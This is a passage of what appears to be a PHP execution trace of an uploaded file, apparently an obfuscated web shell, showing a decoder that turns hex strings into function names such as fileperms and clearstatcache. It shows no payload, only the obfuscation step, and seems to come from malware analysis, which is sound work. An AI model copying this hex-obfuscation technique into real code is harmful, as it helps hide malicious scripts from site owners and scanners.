2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1073	0	0.040469	721752	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1073	1	0.040481	721800
3	1073	R			101
3	1074	0	0.040493	721720	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1074	1	0.040504	721760
3	1074	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1046	1	0.040534	721720
2	1046	R			'clearstatcache'
1		A						/var/www/html/uploads/1CTT.php	7	$func[52] = 'clearstatcache'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1075	0	0.040569	721720	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'646174655f64656661756c745f74696d657a6f6e655f736574'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 49
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1076	0	0.040612	721752	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1076	1	0.040628	721800
3	1076	R			100
3	1077	0	0.040641	721720	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1077	1	0.040652	721760
3	1077	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1078	0	0.040683	721784	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1078	1	0.040695	721832
3	1078	R			97
3	1079	0	0.040708	721752	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1079	1	0.040719	721792
3	1079	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1080	0	0.040750	721784	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1080	1	0.040761	721832
3	1080	R			116
3	1081	0	0.040773	721752	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1081	1	0.040785	721792
3	1081	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1082	0	0.040815	721784	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1082	1	0.040827	721832
3	1082	R			101
3	1083	0	0.040840	721752	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1083	1	0.040851	721792
3	1083	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1084	0	0.040882	721784	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1084	1	0.040893	721832
3	1084	R			95
3	1085	0	0.040906	721752	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1085	1	0.040917	721792
3	1085	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1086	0	0.040947	721784	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1086	1	0.040959	721832
3	1086	R			100
3	1087	0	0.040972	721752	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1087	1	0.040984	721792
3	1087	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1088	0	0.041014	721784	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1088	1	0.041026	721832
3	1088	R			101
3	1089	0	0.041038	721752	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1089	1	0.041050	721792
3	1089	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1090	0	0.041080	721784	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1090	1	0.041091	721832
3	1090	R			102
3	1091	0	0.041104	721752	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1091	1	0.041115	721792
3	1091	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1092	0	0.041145	721792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1092	1	0.041156	721840
3	1092	R			97
3	1093	0	0.041168	721760	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1093	1	0.041180	721800
3	1093	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1094	0	0.041210	721792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1094	1	0.041222	721840
3	1094	R			117
3	1095	0	0.041235	721760	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1095	1	0.041246	721800
3	1095	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1096	0	0.041277	721792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1096	1	0.041288	721840
3	1096	R			108
3	1097	0	0.041301	721760	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1097	1	0.041312	721800
3	1097	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1098	0	0.041341	721792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1098	1	0.041356	721840
3	1098	R			116
3	1099	0	0.041369	721760	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1099	1	0.041380	721800
3	1099	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1100	0	0.041410	721792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1100	1	0.041421	721840
3	1100	R			95
3	1101	0	0.041434	721760	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1101	1	0.041445	721800
3	1101	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1102	0	0.041475	721792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1102	1	0.041487	721840
3	1102	R			116
3	1103	0	0.041499	721760	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1103	1	0.041510	721800
3	1103	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1104	0	0.041540	721792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1104	1	0.041551	721840
3	1104	R			105
3	1105	0	0.041564	721760	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1105	1	0.041574	721800
3	1105	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1106	0	0.041604	721792	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1106	1	0.041615	721840
3	1106	R			109
3	1107	0	0.041627	721760	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1107	1	0.041638	721800
3	1107	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1108	0	0.041670	721800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1108	1	0.041682	721848
3	1108	R			101
3	1109	0	0.041696	721768	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1109	1	0.041708	721808
3	1109	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1110	0	0.041740	721800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'7a'
3	1110	1	0.041751	721848
3	1110	R			122
3	1111	0	0.041763	721768	chr	0		/var/www/html/uploads/1CTT.php	204	1	122
3	1111	1	0.041774	721808
3	1111	R			'z'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'z'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1112	0	0.041804	721800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1112	1	0.041816	721848
3	1112	R			111
3	1113	0	0.041828	721768	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1113	1	0.041839	721808
3	1113	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1114	0	0.041868	721800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1114	1	0.041880	721848
3	1114	R			110
3	1115	0	0.041892	721768	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1115	1	0.041904	721808
3	1115	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1116	0	0.041934	721800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1116	1	0.041946	721848
3	1116	R			101
3	1117	0	0.041958	721768	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1117	1	0.041970	721808
3	1117	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1118	0	0.042000	721800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1118	1	0.042011	721848
3	1118	R			95
3	1119	0	0.042023	721768	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1119	1	0.042035	721808
3	1119	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1120	0	0.042065	721800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1120	1	0.042080	721848
3	1120	R			115
3	1121	0	0.042093	721768	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1121	1	0.042104	721808
3	1121	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1122	0	0.042134	721800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1122	1	0.042146	721848
3	1122	R			101
3	1123	0	0.042158	721768	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1123	1	0.042169	721808
3	1123	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1124	0	0.042199	721808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1124	1	0.042211	721856
3	1124	R			116
3	1125	0	0.042224	721776	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1125	1	0.042235	721816
3	1125	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1075	1	0.042265	721776
2	1075	R			'date_default_timezone_set'
1		A						/var/www/html/uploads/1CTT.php	7	$func[53] = 'date_default_timezone_set'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1126	0	0.042301	721776	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'666c757368'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1127	0	0.042342	721808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1127	1	0.042354	721856
3	1127	R			102
3	1128	0	0.042366	721776	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1128	1	0.042378	721816
3	1128	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1129	0	0.042408	721840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1129	1	0.042420	721888
3	1129	R			108
3	1130	0	0.042432	721808	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1130	1	0.042444	721848
3	1130	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1131	0	0.042474	721840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1131	1	0.042486	721888
3	1131	R			117
3	1132	0	0.042498	721808	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1132	1	0.042509	721848
3	1132	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1133	0	0.042540	721840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1133	1	0.042551	721888
3	1133	R			115
3	1134	0	0.042563	721808	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1134	1	0.042574	721848
3	1134	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1135	0	0.042604	721840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	1135	1	0.042622	721888
3	1135	R			104
3	1136	0	0.042635	721808	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	1136	1	0.042647	721848
3	1136	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1126	1	0.042677	721808
2	1126	R			'flush'
1		A						/var/www/html/uploads/1CTT.php	7	$func[54] = 'flush'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1137	0	0.042710	721808	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7374726c656e'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1138	0	0.042751	721840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1138	1	0.042763	721888
3	1138	R			115
3	1139	0	0.042775	721808	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1139	1	0.042786	721848
3	1139	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1140	0	0.042820	721872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1140	1	0.042832	721920
3	1140	R			116
3	1141	0	0.042845	721840	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1141	1	0.042857	721880
3	1141	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1142	0	0.042887	721872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1142	1	0.042899	721920
3	1142	R			114
3	1143	0	0.042911	721840	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1143	1	0.042922	721880
3	1143	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1144	0	0.042952	721872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1144	1	0.042964	721920
3	1144	R			108
3	1145	0	0.042977	721840	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1145	1	0.042988	721880
3	1145	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1146	0	0.043018	721872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1146	1	0.043030	721920
3	1146	R			101
3	1147	0	0.043042	721840	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1147	1	0.043053	721880
3	1147	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1148	0	0.043083	721872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1148	1	0.043095	721920
3	1148	R			110
3	1149	0	0.043108	721840	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1149	1	0.043118	721880
3	1149	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1137	1	0.043148	721840
2	1137	R			'strlen'
1		A						/var/www/html/uploads/1CTT.php	7	$func[55] = 'strlen'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1150	0	0.043182	721840	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7472696d'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 7
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1151	0	0.043222	721872	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1151	1	0.043235	721920
3	1151	R			116
3	1152	0	0.043247	721840	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1152	1	0.043259	721880
3	1152	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1153	0	0.043289	721904	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1153	1	0.043301	721952
3	1153	R			114
3	1154	0	0.043314	721872	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1154	1	0.043324	721912
3	1154	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1155	0	0.043354	721904	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1155	1	0.043365	721952
3	1155	R			105
3	1156	0	0.043377	721872	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1156	1	0.043389	721912
3	1156	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1157	0	0.043419	721904	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1157	1	0.043430	721952
3	1157	R			109
3	1158	0	0.043442	721872	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1158	1	0.043454	721912
3	1158	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1150	1	0.043484	721872
2	1150	R			'trim'
1		A						/var/www/html/uploads/1CTT.php	7	$func[56] = 'trim'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1159	0	0.043520	721872	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'656d707479'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1160	0	0.043561	721904	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1160	1	0.043573	721952
3	1160	R			101
3	1161	0	0.043586	721872	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1161	1	0.043597	721912
3	1161	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1162	0	0.043628	721936	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1162	1	0.043640	721984
3	1162	R			109
3	1163	0	0.043653	721904	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1163	1	0.043664	721944
3	1163	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1164	0	0.043694	721936	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1164	1	0.043706	721984
3	1164	R			112
3	1165	0	0.043718	721904	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1165	1	0.043730	721944
3	1165	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1166	0	0.043760	721936	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1166	1	0.043771	721984
3	1166	R			116
3	1167	0	0.043784	721904	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1167	1	0.043795	721944
3	1167	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1168	0	0.043825	721936	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	1168	1	0.043836	721984
3	1168	R			121
3	1169	0	0.043848	721904	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	1169	1	0.043860	721944
3	1169	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1159	1	0.043892	721904
2	1159	R			'empty'
1		A						/var/www/html/uploads/1CTT.php	7	$func[57] = 'empty'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1170	0	0.043941	721904	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6973736574'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1171	0	0.043982	721936	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1171	1	0.043994	721984
3	1171	R			105
3	1172	0	0.044006	721904	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1172	1	0.044018	721944
3	1172	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1173	0	0.044048	721968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1173	1	0.044060	722016
3	1173	R			115
3	1174	0	0.044073	721936	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1174	1	0.044084	721976
3	1174	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1175	0	0.044114	721968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1175	1	0.044125	722016
3	1175	R			115
3	1176	0	0.044138	721936	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1176	1	0.044149	721976
3	1176	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1177	0	0.044178	721968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1177	1	0.044190	722016
3	1177	R			101
3	1178	0	0.044202	721936	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1178	1	0.044214	721976
3	1178	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1179	0	0.044244	721968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1179	1	0.044258	722016
3	1179	R			116
3	1180	0	0.044271	721936	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1180	1	0.044282	721976
3	1180	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1170	1	0.044312	721936
2	1170	R			'isset'
1		A						/var/www/html/uploads/1CTT.php	7	$func[58] = 'isset'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1181	0	0.044345	721936	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c657065726d73'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1182	0	0.044386	721968	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1182	1	0.044398	722016
3	1182	R			102
3	1183	0	0.044410	721936	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1183	1	0.044422	721976
3	1183	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1184	0	0.044452	722000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1184	1	0.044465	722048
3	1184	R			105
3	1185	0	0.044477	721968	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1185	1	0.044489	722008
3	1185	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1186	0	0.044519	722000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1186	1	0.044531	722048
3	1186	R			108
3	1187	0	0.044543	721968	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1187	1	0.044554	722008
3	1187	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1188	0	0.044584	722000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1188	1	0.044596	722048
3	1188	R			101
3	1189	0	0.044609	721968	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1189	1	0.044620	722008
3	1189	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1190	0	0.044650	722000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1190	1	0.044661	722048
3	1190	R			112
3	1191	0	0.044674	721968	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1191	1	0.044685	722008
3	1191	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1192	0	0.044715	722000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1192	1	0.044727	722048
3	1192	R			101
3	1193	0	0.044739	721968	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1193	1	0.044751	722008
3	1193	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1194	0	0.044781	722000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1194	1	0.044793	722048
3	1194	R			114
3	1195	0	0.044805	721968	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1195	1	0.044816	722008
3	1195	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1196	0	0.044846	722000	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1196	1	0.044858	722048
3	1196	R			109
3	1197	0	0.044870	721968	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1197	1	0.044882	722008
3	1197	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1198	0	0.044912	722008	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1198	1	0.044924	722056
3	1198	R			115
3	1199	0	0.044936	721976	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1199	1	0.044947	722016
3	1199	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1181	1	0.044981	721976
2	1181	R			'fileperms'
1		A						/var/www/html/uploads/1CTT.php	7	$func[59] = 'fileperms'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1200	0	0.045016	721976	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7374726c656e'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1201	0	0.045056	722008	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1201	1	0.045068	722056
3	1201	R			115
3	1202	0	0.045081	721976	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1202	1	0.045092	722016
3	1202	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1203	0	0.045123	722040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1203	1	0.045135	722088
3	1203	R			116
3	1204	0	0.045148	722008	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1204	1	0.045158	722048
3	1204	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1205	0	0.045189	722040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1205	1	0.045200	722088
3	1205	R			114
3	1206	0	0.045212	722008	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1206	1	0.045224	722048
3	1206	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1207	0	0.045254	722040	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1207	1	0.045266	722088
3	1207	R			108
3	1208	0	0.045279	722008	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1208	1	0.045290	722048
3	1208	R			'l'
